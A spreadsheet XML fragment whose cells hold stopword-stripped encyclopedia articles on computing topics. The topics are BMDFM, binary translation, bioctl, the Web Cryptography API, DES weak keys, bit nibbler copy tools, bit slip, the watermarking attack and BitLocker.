    <t>binary modular dataflow machine (bmdfm) software package enables running application parallel shared memory symmetric multiprocessing (smp) computers using multiple processors speed execution single applications. bmdfm automatically identifies exploits parallelism static mainly dynamic scheduling dataflow instruction sequences derived formerly sequential program. bmdfm dynamic scheduling subsystem performs symmetric multiprocessing (smp) emulation tagged-token dataflow machine provide transparent dataflow semantics applications. directives parallel execution needed. background current parallel shared memory smps complex machines, large number architectural aspects must addressed simultaneously achieve high performance. recent commodity machines technical computing many tightly coupled cores (good examples machines based multi-core processors intel (core xeon) (power)). number cores node planned double every years according computer makers' announcements. multi-core processors intended exploit thread-level parallelism, identified software. hence, challenging task find efficient harness power multi-core processors processing application program parallel. existent openmp paradigm static parallelization fork-join runtime library works pretty well loop-intensive regular array-based computations only, however, compile-time parallelization methods weak general almost inapplicable irregular applications: there many operations take non-deterministic amount time making difficult know exactly certain pieces data become available. memory hierarchy multi-level caches unpredictable memory access latencies. multi-user mode people's codes resources slow part computation compiler cannot account for. compile-time inter-procedural cross-conditional optimizations hard (very often impossible) compilers cannot figure conditional cannot optimize across function call. transparent dataflow semantics bmdfm bmdfm technology mainly uses dynamic scheduling exploit parallelism application program, thus, bmdfm avoids mentioned disadvantages compile-time methods. bmdfm parallel programming environment multi-core provides: conventional programming paradigm requiring directives parallel execution. transparent (implicit) exploitation parallelism natural load balanced manner using available multi-core processors system automatically.bmdfm combines advantages known architectural principles single hybrid architecture able exploit implicit parallelism applications negligible dynamic scheduling overhead bottlenecks. mainly, basic dataflow principle used. dataflow principle says: instruction function executed soon arguments ready. dataflow machine manages tags every piece data runtime. data marked ready data computed. instructions ready arguments executed marking result data ready". main feature bmdfm provide conventional programming paradigm level, so-called transparent dataflow semantics. user understands bmdfm virtual machine (vm), runs statements application program parallel, parallelizing synchronizing mechanisms fully transparent. statements application program normal operators, single threaded program might consist: include variable assignments, conditional processing, loops, function calls, etc. suppose code fragment shown below: first statements independent, dataflow engine bmdfm different processors processor's cores. last statements also parallel computed. dataflow engine recognizes dependencies automatically ability build dataflow graph dynamically runtime. additionally, dataflow engine correctly orders output stream output results sequentially. thus even out-of-order processing results appear natural way. suppose code fragment nested loop: dataflow engine bmdfm keep variables unique contexts iteration. actually, different copies variables. context variable exists referenced instruction consumers. later non-referenced contexts garbage collected runtime. therefore, dataflow engine exploit local parallelism within iteration global parallelism well running multiple iterations simultaneously. architecture bmdfm convenient parallel programming environment efficient runtime engine multi-core mimd unification several architectural paradigms (von-neumann, dataflow): first, hybrid dataflow emulator running multithreadedly commodity smp. ensures mimd dataflow exploits implicit parallelism. second, hybrid multithreaded dataflow runtime engine controlled von-neumann front-end dataflow runtime engine executes tagged-token contextual parallel instructions (opposite restricted fork-join paradigm) von-neumann front-end initializes contexts feeds dataflow runtime engine marshaled clusters instructions. third, hybrid static dynamic parallelizing. von-neumann front-end tries statically split application parallel marshaled clusters instructions dataflow runtime engine complements static parallelizing methods dynamically.bmdfm intended role parallel runtime engine (instead conventional fork-join runtime library) able irregular applications automatically parallel. transparent dataflow semantics top, bmdfm simple parallelization technique application programmers and, time, much better parallel programming compiling technology multi-core computers. basic concept bmdfm relies underlying commodity hardware, available market. normally, vendors provide operating system (os) svr4/posix unix interface (linux, hp-ux, sunos/solaris, tru64osf1, irix, aix, bsd, macos, etc.). multithreaded dataflow runtime engine performs software emulation dataflow machine. such virtual machine interfaces virtual machine language providing transparent dataflow semantics conventional programming. bmdfm built hybrid several architectural principles: mimd (multiple instruction streams, multiple data streams), sustained commodity smp. implicit parallel execution ensured dataflow emulation. von-neumann computational principle good implement front-end control virtual machine. application program (input sequential program) processed three stages: preliminary code reorganization (code reorganizer), static scheduling statements (static scheduler) compiling/loading (compiler, loader). output static scheduling stages multiple clusters flow feeds multithreaded engine interface designed avoid bottlenecks. multiple clusters flow thought compiled input program split marshaled clusters, addresses resolved extended context information. splitting marshaled clusters allows loading multithreadedly. context information lets iterations processed parallel. listener thread orders output stream out-of-order processing. bmdfm dynamic scheduling subsystem efficient emulator tagged-token dataflow machine. shared memory pool divided three main parts: input/output ring buffer port (iorbp), data buffer (db), operation queue (oq). front-end control virtual machine schedules input application program statically puts clustered instructions data input program iorbp. ring buffer service processes (iorbp proc) move data instructions operation queue service processes proc) instructions ready execution required operands' data accessible. execution processes (cpu proc) execute instructions, tagged ready output computed data iorbp. additionally, iorbp proc proc responsible freeing memory contexts processed. context special unique identifier representing copy data within different iteration bodies accordingly tagged-token dataflow architecture. this allows dynamic scheduler handle several iterations parallel. running processes occupy available real machine processors processor cores. order allow several processes accessing data concurrently, bmdfm dynamic scheduler locks objects shared memory pool svr4/posix semaphore operations. locking policy provides multiple read-only access exclusive access modification. supported platforms every machine supporting ansi posix; unix system (svr4) bmdfm. bmdfm provided full multi-threaded versions for: x86: linux/32, freebsd/32, openbsd/32, netbsd/32, macos/32, sunos/32, unixware/32, minix/32, android/32, win-cygwin/32, win-uwin/32, win-sfu-sua/32; x86-64: linux/64, freebsd/64, openbsd/64, netbsd/64, macos/64, sunos/64, android/64, win-cygwin/64; vax: ultrix/32; alpha: tru64osf1/64, linux/64, freebsd/64, openbsd/64; ia-64: hp-ux/32, hp-ux/64, linux/64, freebsd/64; xeonphimic: linux/64; mcst-elbrus: linux/32, linux/64; pa-risc: hp-ux/32, hp-ux/64, linux/32; sparc: sunos/32, sunos/64, linux/32, linux/64, freebsd/64, openbsd/64; mips: irix/32, irix/64, linux/32, linux/64; mipsel: linux/32, linux/64, android/32, android/64; powerpc: aix/32, aix/64, macos/32, macos/64, linux/32, linux/64, freebsd/32, freebsd/64; powerpcle: linux/32, linux/64; s/390: linux/32, linux/64; m68000: linux/32; arm: linux/32, linux/64, freebsd/64, android/32, android/64, macos/64; armbe: linux/64; risc-v: linux/32, linux/64; limited single-threaded version x86: win/32. also dataflow parallel computing symmetric multiprocessing references external links official website</t>
  </si>
  <si>
    <t>Binary translation</t>
  </si>
  <si>
    <t>computing, binary translation form binary recompilation sequences instructions translated source instruction target instruction set. cases instruction simulation, target instruction source instruction set, providing testing debugging features instruction trace, conditional breakpoints spot detection. main types static dynamic binary translation. translation done hardware (for example, circuits cpu) software (e.g. run-time engines, static recompiler, emulators). motivation binary translation motivated lack binary target platform, lack source code compile target platform, otherwise difficulty compiling source target platform. statically-recompiled binaries potentially faster respective emulated binaries, emulation overhead removed. this similar difference performance interpreted compiled programs general. static binary translation translator using static binary translation aims convert code executable file code runs target architecture without code first, done dynamic binary translation. this difficult correctly, since code discovered translator. example, parts executable reachable indirect branches, whose value known run-time. static binary translator uses universal superoptimizer peephole technology (developed sorav bansal, alex aiken stanford university) perform efficient translation possibly many source target pairs, considerably development costs high performance target binary. experiments powerpc-to-x86 translations, binaries even outperformed native versions, average two-thirds native speed. examples static binary translations honeywell provided program called liberator honeywell series computers; could translate programs 1400 series computers programs honeywell series.in 2014, architecture version 1998 video game starcraft generated static recompilation additional reverse engineering original version. pandora handheld community capable developing required tools achieving translations successfully several times.for instance, successful x86-to-x64 static recompilation generated procedural terrain generator video game cube world 2014.another example nes-to-x86 statically recompiled version videogame super mario bros. generated usage llvm 2013.in 2004 scott elliott phillip hutchinson nintendo developed tool generate code game binary could compiled platform linked hardware library airline entertainment systems.in 1995 norman ramsey bell communications research mary fernandez department computer science, princeton university developed jersey machine-code toolkit basic tools static assembly translation. dynamic binary translation dynamic binary translation (dbt) looks short sequence code—typically order single basic block—then translates caches resulting sequence. code translated discovered possible, branch instructions made point already translated saved code (memoization). dynamic binary translation differs simple emulation (eliminating emulator's main read-decode-execute loop—a major performance bottleneck), paying large overhead translation time. this overhead hopefully amortized translated code sequences executed multiple times. more advanced dynamic translators employ dynamic recompilation translated code instrumented find portions executed large number times, portions optimized aggressively. this technique reminiscent compiler, fact compilers (e.g. sun's hotspot technology) viewed dynamic translators virtual instruction (the bytecode) real one. examples dynamic binary translations software apple computer implemented dynamic translating emulator m68k code powerpc line macintoshes, achieved high level reliability, performance compatibility (see emulator). this allowed apple bring machines market partially native operating system, users could adopt new, faster architecture without risking investment software. partly emulator successful, many parts operating system remained emulated. full transition powerpc native operating system (os) made release (10.0) 2001. (the "classic" runtime environment continued offer emulation capability powerpc macs 10.5.) 10.4.4 intel-based macs introduced rosetta dynamic translation layer ease apple's transition ppc-based hardware x86. developed apple transitive corporation, rosetta software implementation transitive's quicktransit solution. quicktransit product lifespan also provided sparc→x86, x86→powerpc mips→itanium translation support. achieved similar success translation tools help users migrate cisc architecture alpha risc architecture. aries (automatic re-translation integrated environment simulation) software dynamic binary translation system combines fast code interpretation phase dynamic translation transparently accurately execute 9000 hp-ux applications hp-ux integrity servers. aries fast interpreter emulates complete non-privileged pa-risc instructions user intervention. during interpretation, monitors application's execution pattern translates frequently executed code native itanium code runtime. aries implements phase dynamic translation, technique translated code first phase collects runtime profile information used second phase translation optimize translated code. aries stores dynamically translated code memory buffer called code cache. further references translated basic blocks execute directly code cache require additional interpretation translation. targets translated code blocks back-patched ensure execution takes place code cache time. emulation, aries discards translated code without modifying original application. aries emulation engine also implements environment emulation emulates 9000 hp-ux application's system calls, signal delivery, exception management, threads management, emulation debugging, core file creation application. created fx!32 binary translator converting applications alpha applications. microsystems' wabi software included dynamic translation sparc instructions. january 2000, transmeta corporation announced novel processor design named crusoe. from site, smart microprocessor consists hardware vliw core engine software layer called code morphing software. code morphing software acts shell morphing translating instructions native crusoe instructions. addition, code morphing software contains dynamic compiler code optimizer result increased performance least amount power. [this] allows transmeta evolve vliw hardware code morphing software separately without affecting huge base software applications. intel corporation developed implemented ia-32 execution layer dynamic binary translator designed support ia-32 applications itanium-based systems, included microsoft windows server itanium architecture, well several flavors linux, including suse. allowed ia-32 applications faster would using native ia-32 mode itanium processors. dolphin emulator gamecube/wii) performs recompilation powerpc code aarch64. examples dynamic binary translations hardware intel cpus since pentium translate complex cisc instructions risc-like internal micro-operations. nvidia tegra denver translates instructions slow hardware decoder native microcode instructions uses software binary translator code. also binary optimization binary recompilation dynamic recompilation just-in-time compilation instruction simulator emulator virtual machine comparison platform virtualization software shadow memory references further reading</t>
  </si>
  <si>
    <t>Bioctl</t>
  </si>
  <si>
    <t>bio(4) pseudo-device driver bioctl(8) utility implement generic raid volume management interface openbsd netbsd. idea behind software similar ifconfig, single utility operating system used control raid controller using generic interface, instead rely many proprietary custom raid management utilities specific given hardware raid manufacturer. features include monitoring health status arrays, controlling identification blinking leds managing sound alarms, specifying spare disks. additionally, softraid configuration openbsd delegated bioctl well; whereas initial creation volumes configuration hardware raid left card bios non-essential operating system already booted. interfacing kernel userland performed ioctl system call /dev/bio pseudo-device. overview bio/bioctl subsystem deemed important part openbsd's advocacy open hardware documentation, release title titular song dedicated topic hackers lost raid. development took place time controversy adaptec refused release appropriate hardware documentation necessary order make aac(4) driver work reliably, followed openbsd disabling support driver.in commentary release, developers express irony hardware raid controllers' supposed purpose providing reliability, redundancy repair, whereas reality many vendors expect system administrators install depend huge binary blobs order assess volume health service disk arrays. specifically, openbsd making reference modus operandi freebsd, documentation aac(4) driver adaptec specifically suggests enabling linux compatibility layer order management utilities (where documentation even fails explain exactly utilities must obtained from, versions would compatible, evidently proprietary tools expired).likewise, openbsd developers intentionally chose concentrate supporting basic features controller uniform across brands variations; specifically, fact initial configuration controller must still made card bios never kept secret bio/bioctl announcement. this contrasted approach taken freebsd, example, individual utilities exist several independent raid drivers, interface utility independent another; specifically, march 2019, freebsd includes separate device-specific utilities called mfiutil, mptutil, mpsutil/mprutil sesutil,, provides many options least subtle differences interface configuration management controllers, contributes code bloat, mention additional drivers tool even exists open-source software all. openbsd (2018), dozen drivers register framework. drive sensors monitoring state logical drive also duplicated hardware monitoring frameworks corresponding utilities systems bioctl available hw.sensors sensorsd openbsd sysmon envsys envstat powerd netbsd. example, openbsd since release, status drive sensors could automatically monitored simply starting sensorsd without specific configuration required. more drivers converted sensors frameworks release. ses/saf-te openbsd, scsi enclosure services (ses) saf-te supported since openbsd (2005) well, feature blinking bioctl implementing biocblink ioctl), helping system administrators identify devices within enclosures service. additionally, saf-te drivers openbsd feature support combination temperature sensors, psu, doorlock alarm indicators; auxiliary sensor data exported hw.sensors framework openbsd, monitored familiar tools like sysctl, snmp sensorsd. 2019, netbsd, older ses/saf-te driver nasa 2000 still place, integrated envsys, device files unique ioctl interface, featuring custom scsi-specific userland tooling; older implementation also available openbsd 2000 2005, removed 2005 (together userland tools) leaner bio- hw.sensors-based alternative drivers introduced; saf-te kept separate drivers openbsd, require separate custom userland utilities anymore, reducing code bloat number source lines code. references</t>
  </si>
  <si>
    <t>Web Cryptography API</t>
  </si>
  <si>
    <t>cryptography world wide consortium’s (w3c) recommendation low-level interface would increase security applications allowing perform cryptographic functions without access keying material. this agnostic would perform basic cryptographic operations, hashing, signature generation verification encryption well decryption within application. description january 2017, released recommendation cryptography could perform basic cryptographic operations applications. this agnostic would utilize javascript perform operations would increase security data exchange within applications. would provide low-level interface create and/or manage public keys private keys hashing, digital signature generation verification encryption decryption applications. cryptography could used wide range uses, including: providing authentication users services electronic signing documents code protecting integrity confidentiality communication digital data exchangebecause cryptography agnostic nature, used platform. would provide common interfaces would permit applications progressive applications conduct cryptographic functions without need access keying material. this would done assistance subtlecrypto interface, defines group methods perform cryptographic operations. additional interfaces within cryptography would allow generation, derivation import export. vision using cryptography w3c’s specification cryptography places focus common functionality features currently exist platform-specific standardized cryptographic apis versus known implementations. group’s recommendation cryptography dictate mandatory algorithms must implemented. this awareness cryptographic implementations vary amongst conforming user agents government regulations, local policies, security practices intellectual property concerns. there many types existing applications cryptography would well suited with. multi-factor authentication today multi-factor authentication considered reliable methods verifying identity user application, online banking. many applications currently depend authentication method protect user user agent. with cryptography api, application would ability provide authentication within instead rely transport-layer authentication secret keying material authenticate user access. this process would provide richer experience user. cryptography would allow application locate suitable client keys previously created user agent pre-provisioned application. application would able give user agent ability either generate re-use existing event user already associated account. binding process transport layer security user authenticating through, multi-factor authentication process additionally strengthened derivation based underlying transport. protected document exchange used protect sensitive confidential documents unauthorized viewing within application, even previously securely received. application would cryptography encrypt document secret wrap public keys associated users authorized view document. upon navigating application, authorized user would receive document encrypted would instructed private begin unwrapping process would allow decrypt view document. cloud storage many businesses individuals rely cloud storage. protection, remote service provide might want application give users ability protect confidential documents uploading documents data. cryptography would allow users choose select private secret derive encryption wish encrypt document/data upload encrypted document/data using service provider’s existing apis electronic document signing ability electronically sign documents saves time, enhances security important documents serve legal proof user’s acceptance document. many applications choose accept electronic signatures instead requiring written signatures. with cryptography api, user would prompted choose could generated pre-provisioned specifically application. could used signing operation. protecting data integrity applications often cache data locally, puts data risk compromise offline attack occur. cryptography permits application public deployed within verify integrity data cache. secure messaging cryptography enhance security messaging off-the-record (otr) types message-signing schemes agreement. message sender intended recipient would negotiate shared encryption message authentication code (mac) keys encrypt decrypt messages prevent unauthorized access. json object signing encryption (jose) cryptography used applications interact message formats structures defined jose working group. application read import json signature (jwk) keys, validate messages protected electronic signing keys decrypt messages. conformance cryptography recommends vendors avoid using vendor-specific proprietary extensions specifications cryptography api. this could reduce interoperability break user base since users would able access particular content. recommended vendor-specific extension cannot avoided, vendor prefix vendor-specific strings prevent clashes future generations api’s specifications. references external links official website crypto docs</t>
  </si>
  <si>
    <t>Weak key</t>
  </si>
  <si>
    <t>cryptography, weak key, which, used specific cipher, makes cipher behave undesirable way. weak keys usually represent small fraction overall keyspace, usually means that, generates random encrypt message, weak keys unlikely give rise security problem. nevertheless, considered desirable cipher weak keys. cipher weak keys said flat, linear, space. historical origins virtually rotor-based cipher machines (from 1925 onwards) implementation flaws lead substantial number weak keys created. some rotor machines problems weak keys others, modern block stream ciphers first stream cipher machines also rotor machines problems weak keys traditional rotor machines. stream cipher machine weak problems. british first detected traffic summer autumn 1942. link sicily libya, codenamed "sturgeon", another aegean sicily, codenamed "mackerel". operators links habit enciphering several messages machine settings, producing large numbers depths. there several (mostly incompatible) versions t52: t52a t52b (which differed electrical noise suppression), t52c, t52d t52e. while t52a/b t52c cryptologically weak, last advanced devices; movement wheels intermittent, decision whether advance controlled logic circuits took input data wheels themselves. addition, number conceptual flaws (including subtle ones) eliminated. flaw ability reset keystream fixed point, reuse undisciplined machine operators. weak keys block cipher specific keys termed "weak keys" "semi-weak keys". these keys cause encryption mode identically decryption mode (albeit potentially different key). operation, secret 56-bit broken subkeys according schedule; subkey used sixteen rounds. weak keys produce sixteen identical subkeys. this occurs (expressed hexadecimal) alternating ones zeros (0x0101010101010101) alternating (0xfefefefefefefefe) '0xe0e0e0e0f1f1f1f1' '0x1f1f1f1f0e0e0e0e'if implementation consider parity bits, corresponding keys inverted parity bits also work weak keys: zeros (0x0000000000000000) ones (0xffffffffffffffff) '0xe1e1e1e1f0f0f0f0' '0x1e1e1e1e0f0f0f0f'using weak keys, outcome permuted choice (pc-1) schedule leads round keys either zeros, ones alternating zero-one patterns. since subkeys identical, feistel network, encryption function self-inverting; despite encrypting giving secure-looking cipher text, encrypting twice produces original plaintext. also semi-weak keys, produce different subkeys, used eight times algorithm: this means come pairs property that: {\displaystyle e_{k_{1}}(e_{k_{2}}(m))=m} ek(m) encryption algorithm encrypting message there semi-weak pairs: 0x011f011f010e010e 0x1f011f010e010e01 0x01e001e001f101f1 0xe001e001f101f101 0x01fe01fe01fe01fe 0xfe01fe01fe01fe01 0x1fe01fe00ef10ef1 0xe01fe01ff10ef10e 0x1ffe1ffe0efe0efe 0xfe1ffe1ffe0efe0e 0xe0fee0fef1fef1fe 0xfee0fee0fef1fef1there also possibly weak keys produce four distinct subkeys (instead 16). they found nist publication.these weak semi-weak keys considered "fatal flaws" des. there (7.21 1016, quadrillion) possible keys des, four weak twelve semi-weak. this tiny fraction possible keyspace users need worry. desire, check weak semi-weak keys keys generated. they few, easy recognize. note, however, currently longer recommended general since keys brute-forced decades since deep crack machine cracking order days, computers tend recent solutions vastly cheaper time scale. examples progress deep crack's article. list algorithms weak keys des, detailed above. rc4. rc4's weak initialization vectors allow attacker mount known-plaintext attack widely used compromise security wep. idea. idea's weak keys identifiable chosen-plaintext attack. they make relationship plaintext bits ciphertext bits predictable. there list keys, identified "structure". blowfish. blowfish's weak keys produce s-boxes, since blowfish's s-boxes key-dependent. there chosen plaintext attack reduced-round variant blowfish made easier weak keys. this concern full 16-round blowfish. gmac. frequently used aes-gcm construction. weak keys identified group order authentication (for aes-gcm, derived encryption encrypting zero block). dsa. august 2012 nadia heninger, zakir durumeric, eric wustrow, alex halderman found certificates assessed share keys insufficient entropy generation, able obtain private keys hosts knowing public key. weak keys design goal goal 'flat' keyspace (i.e., keys equally strong) always cipher design goal. case des, sometimes small number weak keys acceptable, provided identified identifiable. algorithm unknown weak keys inspire much trust.the main countermeasures inadvertently using weak key: checking generated keys list known weak keys, building rejection weak keys scheduling. when number weak keys known small comparison size keyspace), generating uniformly random ensures probability weak (known) small number.a large number weak keys serious flaw cipher design, since (perhaps too) large chance randomly generated weak one, compromising security messages encrypted also take longer check randomly generated keys weakness cases, tempt shortcuts interest 'efficiency'. however, weak keys much often problem adversary control keys used, block cipher used mode operation intended construct secure cryptographic hash function (e.g. davies–meyer). also authentication factors strong authentication multifactor authentication references</t>
  </si>
  <si>
    <t>Bit nibbler</t>
  </si>
  <si>
    <t>nibbler, nibbler, computer software program designed copy data floppy disk time. functions level directly interacting disk drive hardware override copy protection scheme floppy disk's data stored cases nibbler software still analyses data byte level, looking level dealing synchronization marks (syncs), zero-gaps sector track headers. when possible, nibblers work low-level data encoding format used disk system, group coded recording (gcr apple, commodore), frequency modulation atari), modified frequency modulation (mfm amiga, atari, pc). overview software piracy began concern floppy disks became common storage media. ease copying depended system; jerry pournelle wrote byte 1983 "cp/m lend copy protection" users "haven't worried" "apple users, though, always problem. used trs-dos, understand ms-dos copy protection features". apple commodore copy protection schemes extremely varied creative floppy disk reading writing controlled software firmware), hardware. pournelle disliked copy protection and, except games, refused review software used believe useful, writing "for every copy protection scheme there's hacker ready defeat most involve so-called nybble copiers, analyze original disk make copy". 1980, first 'nibble' copier, locksmith, introduced apple these copiers reproduced copy protected floppy disks entire track time, ignoring sectors marked. this harder sounds reasons: firstly, apple disks index hole mark start track; drives could even detect index hole. tracks could thus start anywhere, copied track "write splice", always caused bits lost duplicated speed variations, roughly (unused payload data) place original, would work. secondly, apple used special "self-sync" bytes achieve agreement drive controller computer byte ended next started disk. these bytes written normal data bytes followed slightly longer normal pause, notoriously unreliable detect read-back; still, self-sync bytes roughly right without present right places, copy would work, present many places, track would destination disk. apple locksmith copied apple disks taking advantage fact sync fields sectors almost always consisted long string (hex bits) bytes. found longest string ffs, usually occurred last first sectors track, began writing track middle that; also assumed long string bytes sync sequence introduced necessary short pauses writing copy. ironically, locksmith would copy itself. first locksmith measured distance sector track. copy protection engineers quickly figured locksmith began technique defeat locksmith countered introducing ability reproduce track alignment prevented copied embedding special sequence nibbles, found, would stop copy process. henry roberts (cto nalpeiron), graduate student computer science university south carolina, reverse engineered locksmith, found sequence distributed information people producing copy protection time.for time, locksmith continued defeat virtually copy protection systems existence. next advance came henry roberts' thesis software copy protection, devised replacing apple’s sync field random appearing patterns bytes. because graduate student frequent copy protection discussions apple’s copy protection engineer, apple developed copy protection system made technique. henry roberts wrote competitive program locksmith, back devised several methods defeating that, ultimately method devised reading self sync fields directly, regardless nibbles contained. back forth struggle copy protection engineers nibble copiers continued apple became obsolete replaced clones. commodore part fast hack'em disk copy software nibbler used produce copies copy protected commodore commercial software. when using nibbler, disk copying done level, bit-by-bit rather using standard commodore commands. this effectively nullified efficacy deliberate disk errors, non-standard track layouts, related forms copy prevention. copying protected disk took approximately seconds copied directly another disk drive, minutes (plus several disk swaps) performed using single disk drive. super kit/1541 sold prism software around 1986 written peter also wrap speed vmax copy protection. included many different copiers like normal copier, nibbler, file copier, super nibbler, disk surgeon, disk editors. there also parameters side-b (see list below). drives could also daisy chained programmed computer could disconnected drives copying checking disk insertion around seconds. interesting fact program could make copy itself, could make copy copy sync length original shorter copy made loader checked length copy would much longer sync. later released author. nibtools modern (circa 2006) open source software performs function, intended mainly archiving data floppies copyright-protected damaged. instead reading bit-by-bit, also read many 1.25 stretches assemble together akin shotgun sequencing, approach necessary using slow connections commodore 1541.rapidlok copy protection scheme used widely many companies versions never successfully copied. they used value sectors caused copiers become "flaky" illegal value. references</t>
  </si>
  <si>
    <t>Bit slip</t>
  </si>
  <si>
    <t>digital transmission, slip loss gain bits, caused clock drift variations respective clock rates transmitting receiving devices. cause slippage overflow receive buffer occurs transmitter's clock rate exceeds receiver. this causes bits dropped lack storage capacity. maintain timing transmitting receiving devices employ asynchronous protocol start-stop. alternatively, slip prevented using self-clocking signal (such signal modulated using oqpsk) using line coding manchester encoding. another cause "losing count", hard drive: hard drive encounters long string without string without 0s), lose track frame fields, suffer slip. when pulse consecutive zero bits sent, clock drift cause hardware apparently detect zero bits zero bits—both kinds errors called slip.thus prevents long strings without change devices length limited codes. many communication systems linear-feedback shift register scrambling prevent long strings symbol), including vsat, 1000base-t, 2615, etc. while scrambler makes "losing count" type slip error occur less often, slip errors occur (perhaps reasons), scramblers property expanding small errors lose single much longer burst errors. optimized cipher feedback mode (ocfb), statistical self-synchronization mode, "one-bit mode" also expand small bit-slip errors longer burst errors, eventually recover produce correct decrypted plaintext. bit-slip error using block cipher mode operation generally results complete corruption rest message. also clock drift references</t>
  </si>
  <si>
    <t>Watermarking attack</t>
  </si>
  <si>
    <t>cryptography, watermarking attack attack disk encryption methods presence specially crafted piece data detected attacker without knowing encryption key. problem description disk encryption suites generally operate data 512-byte sectors individually encrypted decrypted. these 512-byte sectors alone block cipher mode operation (typically cbc), since arbitrary sectors middle disk need accessible individually, cannot depend contents preceding/succeeding sectors. thus, cbc, sector initialization vector (iv). predictable attacker (and filesystem reliably starts file content offset start sector, files likely largely contiguous), chosen plaintext attack reveal existence encrypted data. problem analogous using block ciphers electronic codebook (ecb) mode, instead whole blocks, first block different sectors identical. problem relatively easily eliminated making unpredictable with, example, essiv.alternatively, modes operation specifically designed disk encryption (see disk encryption theory). this weakness affected many disk encryption programs, including older versions bestcrypt well now-deprecated cryptoloop.to carry attack, specially crafted plaintext file created encryption system attack, "nop-out" first ciphertext block sectors identical. this requires input cipher (plaintext, {\displaystyle \scriptstyle initialisation vector, {\displaystyle \scriptstyle block must same; i.e., {\displaystyle \scriptstyle p_{1}\,\oplus \,iv_{1}\;=\;p_{2}\,\oplus \,iv_{2}} thus, must choose plaintexts, {\displaystyle \scriptstyle p_{1},\,p_{2}} {\displaystyle \scriptstyle p_{1}\,\oplus \,p_{2}\;=\;iv_{1}\,\oplus \,iv_{2}} ciphertext block patterns generated give away existence file, without need disk decrypted first. also disk encryption theory initialization vector block cipher modes operation watermark references</t>
  </si>
  <si>
    <t>BitLocker</t>
  </si>
  <si>
    <t>bitlocker full volume encryption feature included microsoft windows versions starting windows vista. designed protect data providing encryption entire volumes. default, uses encryption algorithm cipher block chaining (cbc) mode 128-bit 256-bit key. used whole disk; applied individual sector. history bitlocker originated part microsoft's next-generation secure computing base architecture 2004 feature tentatively codenamed "cornerstone" designed protect information devices, particularly device lost stolen; another feature, titled "code integrity rooting", designed validate integrity microsoft windows boot system files. when used conjunction compatible trusted platform module (tpm), bitlocker validate integrity boot system files decrypting protected volume; unsuccessful validation prohibit access protected system. bitlocker briefly called secure startup windows vista's release manufacturing.bitlocker available ultimate enterprise editions windows vista windows enterprise editions windows pro, enterprise, education editions windows pro, enterprise, education editions windows windows server 2008 later features initially, graphical bitlocker interface windows vista could encrypt operating system volume. starting windows vista service pack windows server 2008, volumes operating system volume could encrypted using graphical tool. still, aspects bitlocker (such turning autolocking off) managed command-line tool called manage-bde.wsf.the version bitlocker included windows windows server 2008 adds ability encrypt removable drives. windows windows vista, read-only access drives achieved program called bitlocker reader, fat16, fat32 exfat filesystems used. addition, command-line tool called manage-bde replaced manage-bde.wsf.starting windows server 2012 windows microsoft complemented bitlocker microsoft encrypted hard drive specification, allows cryptographic operations bitlocker encryption offloaded storage device's hardware. addition, bitlocker managed windows powershell. finally, windows introduced windows enterprise edition, bitlocker protect. device encryption windows mobile 6.5, windows core editions windows include device encryption, feature-limited version bitlocker encrypts whole system. logging microsoft account administrative privileges automatically begins encryption process. recovery stored either microsoft account active directory, allowing retrieved computer. while device encryption offered versions 8.1, unlike bitlocker, device encryption requires device meet instantgo (formerly connected standby) specifications, requires solid-state drives, non-removable protect cold boot attacks) chip.starting windows 1703, requirements device encryption changed, requiring module support, uefi secure boot, device meets modern standby requirements hsti validation.in september 2019 update released (kb4516071) changing default setting bitlocker encrypting self-encrypting hard drive. now, default software encryption newly encrypted drives. this hardware encryption flaws security concerns related issues. encryption modes three authentication mechanisms used building blocks implement bitlocker encryption: transparent operation mode: this mode uses capabilities hardware provide transparent user experience—the user powers logs windows usual. used disk encryption sealed (encrypted) chip released loader code early boot files appear unmodified. pre-os components bitlocker achieve implementing static root trust measurement—a methodology specified trusted computing group (tcg). this mode vulnerable cold boot attack, allows powered-down machine booted attacker. also vulnerable sniffing attack, volume encryption transferred plain text successful boot. user authentication mode: this mode requires user provide authentication pre-boot environment form pre-boot password. mode: user must insert device contains startup computer able boot protected note mode requires bios protected machine supports reading devices pre-os environment. bitlocker support smart cards pre-boot authentication.the following combinations authentication mechanisms supported, optional escrow recovery key: password operation bitlocker logical volume encryption system. volume spans part hard disk drive, whole drive drive.) when enabled, bitlocker ensure integrity trusted boot path (e.g. bios boot sector), order prevent offline physical attacks boot sector malware.in order bitlocker encrypt volume holding operating system, least ntfs-formatted volumes required: operating system (usually another minimum size remains unencrypted boots operating system. case windows vista windows server 2008, however, volume's minimum size must drive letter.) unlike previous versions windows, vista's "diskpart" command-line tool includes ability shrink size ntfs volume volume created already allocated space. tool called bitlocker drive preparation tool also available microsoft allows existing volume windows vista shrunk make room boot volume necessary bootstrapping files transferred it.once alternate boot partition created, module needs initialized (assuming feature used), required disk-encryption protection mechanisms tpm, configured. volume encrypted background task, something take considerable amount time large disk every logical sector read, encrypted rewritten back disk. keys protected whole volume encrypted volume considered secure. bitlocker uses low-level device driver encrypt decrypt file operations, making interaction encrypted volume transparent applications running platform.encrypting file system (efs) used conjunction bitlocker provide protection operating system running. protection files processes users within operating system performed using encryption software operates within windows, efs. bitlocker efs, therefore, offer protection different classes attacks.in active directory environments, bitlocker supports optional escrow active directory, although schema update required work (i.e. active directory services hosted windows version previous windows server 2008). bitlocker full disk encryption systems attacked rogue boot manager. once malicious bootloader captures secret, decrypt volume master (vmk), would allow access decrypt modify information encrypted hard disk. configuring protect trusted boot pathway, including bios boot sector, bitlocker mitigate threat. (note non-malicious changes boot path cause platform configuration register check fail, thereby generate false warning.) security concerns alone enough "transparent operation mode" "user authentication mode" bitlocker hardware detect unauthorized changes pre-boot environment, including bios mbr. unauthorized changes detected, bitlocker requests recovery device. this cryptographic secret used decrypt volume master (vmk) allow bootup process continue. however, alone enough: february 2008, group security researchers published details so-called "cold boot attack" allows full disk encryption systems bitlocker compromised booting machine removable media, drive, another operating system, dumping contents pre-boot memory. attack relies fact dram retains information several minutes even longer, cooled) power removed. bress/menz device, described patent 9,514,789, accomplish type attack. similar full disk encryption mechanisms vendors operating systems, including linux vulnerable attack. authors recommend computers powered physical control owner (rather left sleep mode) encryption software configured require password boot machine.on november 2015, microsoft released security update mitigate security vulnerability bitlocker allowed authentication bypassed employing malicious kerberos distribution center, attacker physical access machine, machine part domain flash drive protection. bitlocker still properly support security features which, result, lead complete bypass privacy protection keys transmitted serial peripheral interface motherboard.all attacks require physical access system thwarted secondary protector flash drive code. upholding kerckhoffs's principle although encryption algorithm used bitlocker public domain, implementation bitlocker, well components software, proprietary; however, code available scrutiny microsoft partners enterprises, subject non-disclosure agreement.according microsoft 